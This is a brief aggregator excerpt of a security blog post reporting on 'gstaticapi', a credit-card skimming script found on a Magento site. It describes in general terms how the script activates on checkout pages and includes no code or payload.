Magento Credit Card Stealing Malware: gstaticapi

Magento Credit Card Stealing Malware: gstaticapi

Our team recently came across a malicious script used on a Magento website titled gstaticapi, which targeted checkout processes to capture and exfiltrate stolen information.

To obtain sensitive details, the malware loads external javascript whenever the URL contains “checkout” ⁠— this location typically belongs to the step in Magento’s checkout process where users enter their sensitive credit card information and shipping details.

As seen above, the first if statement looks for the checkout string in the URL using window.location.href.indexOf.

Continue reading Magento Credit Card Stealing Malware: gstaticapi at Sucuri Blog.

Read more: Magento Credit Card Stealing Malware: gstaticapi

Story added 25. September 2020, content source with full text you can find at link above.